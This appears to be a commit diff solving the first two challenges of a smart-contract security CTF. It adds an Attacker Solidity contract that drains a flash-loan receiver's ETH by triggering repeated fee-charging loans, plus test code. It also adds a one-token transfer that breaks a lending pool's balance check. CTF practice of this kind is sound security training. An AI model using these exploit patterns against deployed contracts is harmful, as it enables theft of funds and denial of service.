[Solved] - Challenges #1 and theredguild#2

contracts/naive-receiver/Attacker.sol

@@ -0,0 +1,22 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.0;
+
+interface INaiveReceiverLenderPool {
+    function flashLoan(address borrower, uint256 borrowAmount) external;
+    function fixedFee() external pure returns (uint256);
+}
+
+contract Attacker {
+    INaiveReceiverLenderPool private pool;
+
+    constructor(address _pool) {
+        pool = INaiveReceiverLenderPool(_pool);
+    }
+
+    function drainReceiver(address _receiver) public {
+        uint8 times = uint8(_receiver.balance / pool.fixedFee());
+        for (uint8 i = 0; i < times; i++) {
+            pool.flashLoan(_receiver, address(pool).balance);
+        }
+    }
+}

test/naive-receiver/naive-receiver.challenge.js

@@ -30,7 +30,11 @@ describe('[Challenge] Naive receiver', function () {
     });
 
     it('Exploit', async function () {
-        /** CODE YOUR EXPLOIT HERE */   
+        /** CODE YOUR EXPLOIT HERE */
+        const AttackerFactory = await ethers.getContractFactory('Attacker', attacker);
+        this.attackerContract = await AttackerFactory.deploy(this.pool.address);
+
+        await this.attackerContract.connect(attacker).drainReceiver(this.receiver.address);
     });
 
     after(async function () {

test/unstoppable/unstoppable.challenge.js

@@ -40,6 +40,8 @@ describe('[Challenge] Unstoppable', function () {
 
     it('Exploit', async function () {
         /** CODE YOUR EXPLOIT HERE */
+        await this.token.connect(attacker).transfer(this.pool.address, 1)
+        expect(this.pool.poolBalance()).to.be.not.equal(this.token.balanceOf(this.pool.address));
     });
 
     after(async function () {